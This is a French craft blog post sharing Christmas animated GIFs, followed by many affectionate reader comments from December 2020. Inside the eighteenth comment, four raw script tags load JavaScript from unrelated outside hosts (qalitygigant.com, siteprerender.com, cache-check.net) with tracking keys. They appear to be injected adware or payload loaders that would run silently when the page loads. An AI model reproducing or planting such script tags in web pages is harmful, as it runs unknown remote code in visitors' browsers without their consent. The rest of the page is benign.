• Mes Créas Joyeux Noël pour Vous ♥

     

     

    Mes Créas Joyeux Noël pour Vous ♥

     

     

    On se retrouve aujourd'hui, pour vous proposer des nouvelles créations "Joyeux Noël" que vous pourrez retrouver dans la Rubrique "Fêtes"-"Noël" avec d'anciennes créations toujours d'actualité ICI

     

     

    Mes Créas Joyeux Noël pour Vous ♥

     

     

     

     

     

    Mes Créas Joyeux Noël pour Vous ♥

     

     

     

     

     

    Mes Créas Joyeux Noël pour Vous ♥

     

    [ pour celle-ci le Père Noël est à retrouver dans la Rubrique "Mes Tubes"-"Noël" ICI ]

     

     

     

     

     

    Mes Créas Joyeux Noël pour Vous ♥

     

    [ A Retrouver dans la Rubrique "Séparations"-"Hiver,Noël" ICI ]

     

     

     

     

     

    Mes Créas Joyeux Noël pour Vous ♥

     

    [ A Retrouver dans la Rubrique "Bisous"-"Hiver,Noël" ICI ]

     

     

     

     

     

    Mes Créas Joyeux Noël pour Vous ♥

     

     

     

     

     

    Mes Créas Joyeux Noël pour Vous ♥

     

    [ A Retrouver dans la Rubrique "Bonne Journée"-"Hiver,Noël" ICI ]

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    37
    Dimanche 27 Décembre 2020 à 11:27

    Je rattrape mon retard et te remercie pour ces jolies créations, dans lesquelles j'ai allégrement pioché !

    Gros Bisous

    36
    Vendredi 25 Décembre 2020 à 15:14
    Salut
    Je viens te souhaiter un bon noël à tout ta famille
    Ici il neige c est beau
    Bisous de la Suisse
    35
    Mercredi 23 Décembre 2020 à 19:31

    tes créations sont superbes bravo

    bisous

    34
    Samedi 19 Décembre 2020 à 17:00

    Superbe comme toujours

    Je visionne tout dans le désordre, mais pas mal de retard 

    Bisous

    33
    Samedi 19 Décembre 2020 à 03:02

    coucou Valie 

    je passe te souhaiter bonne fête de Noël,superbes tes gifs 

    je vais faire une petite pause un peu repos 

    en ce moment de fête je te fais un petit cadeau

     prends soin de toi  et de tes proches 

    Bisous Frane 

     

    32
    Jacline-H-49
    Vendredi 18 Décembre 2020 à 17:18

    Cc ma Valie,

    Trop beaux tes Gifs ! J'adoooore ! 

    Merci de nous abreuver de si belles images.

    Je t'aime fort et je t'envoie de 

    TRES GROS BISOUS TENDRESSE.

    Bonne soirée.

    Jacline

    31
    Vendredi 18 Décembre 2020 à 16:10

    Bon Week End à tous bisous - Titi Créationsbonsoir valie 

    pluie et vent chez moi 

    marre de ce temps 

    tu as vu j'ai mis ta belle création 

    mais exuse moi je vais mettre ton nom 

    bon week-end  a toi 

    bisous 

    30
    gaelle
    Vendredi 18 Décembre 2020 à 15:54

    cette fois ci c'est moi qui te vole tes creas magnifiques!!!merci infiniment

    biz

    gaelle

    29
    Vendredi 18 Décembre 2020 à 12:25

    P'TITS MOTS FIN D'ANNÉEj adore tes creations, en général j en met une par post , j aime ce qui scintille alors ça me va, j espere que tu vas passer un bon week end ma Valie , ici sous la pluie mais ça tombe bien je ne sors pas je fais du tri, j ai reçu les cartons bisous d affection et prenez tous soins de vous

    28
    Vendredi 18 Décembre 2020 à 10:20

    merci valie pour tous ces beaux gifs gros bisous belle journée

    27
    Vendredi 18 Décembre 2020 à 08:56

    Bonjour, aujourd'hui j' ai pris le bonjour avec la jeune fille et le vin de Noêl , je  ne sais plus quoi choisir tellement tout me plaît. Merci à toi . Comme toi j' en ai marre d'entendre toutes les lamentations que maintenant je zappe les infos. Ce matin par chez moi le ciel est bien dégagé mais avec seulement 2° . Je ne suis pas comme toi pas envie d'avoir de la neige même si c'est beau dans le jardin mais j' ai déjà beaucoup de travail avec mes titous alors si ils vont dans la neige j' en ai bien pour 2h de toilettage sur eux et le nettoyage de la maison . Je te souhaite un bon Vendredi et une bonne journée.
    Amicalement 
    httphttp://york-and-co-2.forumactif.org/://york-and-co-2.forumactif.org/

    26
    Jeudi 17 Décembre 2020 à 22:38

    Bonsoir ma chère Valie

    Elles sont superbes tes créations animées 

    quel travail tu fais pour faire plaisir à tes amies

    Je te remercie pour ta réponse moi ça va même si ce n'est pas la meilleure des périodes 

    Bonne soirée et gros bisous

    ton amie Janine

    25
    Jeudi 17 Décembre 2020 à 19:06

    Un énorme Merci pour toutes ces belles créations de Noël, j'Adooore !!!!

    Bonne soirée, Mille Bisous tout doux.

    24
    marianne pirotte
    Jeudi 17 Décembre 2020 à 18:04

    Merci ma belle pour ces sublimes créations !!

    Gros bisous

    Marianne

    23
    Jeudi 17 Décembre 2020 à 18:01

    Coucou Valie

    Elles sont toutes très jolies tes créations et j'adore!

    Bonne soirée à toi et plein de gros bisous

    22
    Jeudi 17 Décembre 2020 à 17:24

    Comme c'est joli tout sa ma tite Valie! merci

    Bisous et belle soirée

    21
    Jeudi 17 Décembre 2020 à 16:50

    merci valie pour ces belles créas 

    gros bisous

     

    20
    Jeudi 17 Décembre 2020 à 16:38

    Un grand merci ma belle Valie pour ces magnifiques gifs de Noël. Passe une douce soirée et un beau vendredi, bisou rose tendresse !

    19
    Jeudi 17 Décembre 2020 à 14:19

    Merci Valie, je me uis servie.
    Bisous.

    18
    mamijojo77100
    Jeudi 17 Décembre 2020 à 13:02

    tu nous gates encore pour cette fin d annee bien tristounette..je fais mon marche regulierement pour enrichir mon stock..bonne fin d annee ma belle gbisous et bonne journee  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1608206395425" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    17
    Jeudi 17 Décembre 2020 à 12:31
    lamanuelle25

    J'adore tes gifs ils sont superbes! Merci de nous les offrir!! Bisous Nadine

    16
    Jeudi 17 Décembre 2020 à 11:53
    Cc value merci pour se beau partage bonne journée gros bisous
    15
    Jeudi 17 Décembre 2020 à 10:10

    Coucou 

    merci Valie pour toutes ses magnifiques créations de Noel 

    je vais m en servir pour envoyer à ma famille 

    Gros bisous et bravo à toi 

    14
    Jeudi 17 Décembre 2020 à 09:58

       bravo  et  merci  pour  ces  belles  créas   

     gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    13
    Jeudi 17 Décembre 2020 à 09:53

    bonjour valie 

    super jolies créations 

    merci de ton partage !!!!

    j'en ai pris trois 

    bisous a toi

    12
    Jeudi 17 Décembre 2020 à 09:37
    dane

    coucou ces joyeux festifs j' aime beaucoup un beau partage bisous bisous 

    11
    Jeudi 17 Décembre 2020 à 09:15

    J'adore...j'adore...Merci Valie...

    Douce journée...Je pense bien à Toi.

    Gros bisous*

     

    Mes Créas Joyeux Noël pour Vous ♥

     

    10
    Jour de mai
    Jeudi 17 Décembre 2020 à 08:58

    Coucou ma Valie, 

    Encore et toujours de magnifiques créations et sois en certaine, elles vont être utilisées. Je les trouve festives et cela met de la magie qui manque actuellement dans notre environnement. 

    Bravo et merci pour ce partage. 

    Excellent jeudi qui devrait être ensoleillé. 

    De très gros bisous ♥♥♥♥

    LN

    9
    Jeudi 17 Décembre 2020 à 08:55

    Bonjour Valie, superbes créas. merci !

    8
    Jeudi 17 Décembre 2020 à 08:46

    Superbes comme d'habitude ; gros coup de coeur pour la dernière ;

    belle journée ; bisous / Nicole

    7
    Jeudi 17 Décembre 2020 à 08:37

    Comme elles sont jolies et tu sais combien j'aime noël. Bonne journée. Gros bisous

    6
    JO
    Jeudi 17 Décembre 2020 à 08:23

    Coucou ma Valie

    De pures merveilles que tu nous offres.

    J'adoreeeeee♥♥♥

    Je ne suis toujours pas présente sur mon blog!!!

    toutefois! je me suis servie(lol)

    Un grand merci, tu es formidable et talentueuse

    avec tes superbes créations.

    Bonne journée, chez moi ensoleillée et douce.

    BISOUS DOUX ♥♥♥♥♥

    JO

    Mes Créas Joyeux Noël pour Vous ♥

    5
    Dom71
    Jeudi 17 Décembre 2020 à 08:19
    Merci Valie! C’est superbe, comme d’habitude. Bonne journée à tous !
    4
    Jeudi 17 Décembre 2020 à 07:56

    Heureusement que sur ton blog Noël est présent !! C'est un peu tristounet dehors sinon... 

    Bises

    Thaly

    3
    Jeudi 17 Décembre 2020 à 07:54

    Très belles tes créations de Noël!! Je me suis servie  comme d'habitude et merci pour le partage......

    Bisous et douce journée

    2
    Jeudi 17 Décembre 2020 à 07:27

    Merci faire entrer la féérie de Noël dans ma scrap room Valie ! Je me régale ! Bravo +++ !

    Bonne journée ! Bisous bisous !

    1
    Jeudi 17 Décembre 2020 à 07:07

    Bonjour ma Valie, encore et toujours de très belles créations qui nous rapproche de Noël... Merci elles sont superbes et nous allons en faire bon usage...

    Je te souhaite une jeudi agréable

    Bisous de Pat

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :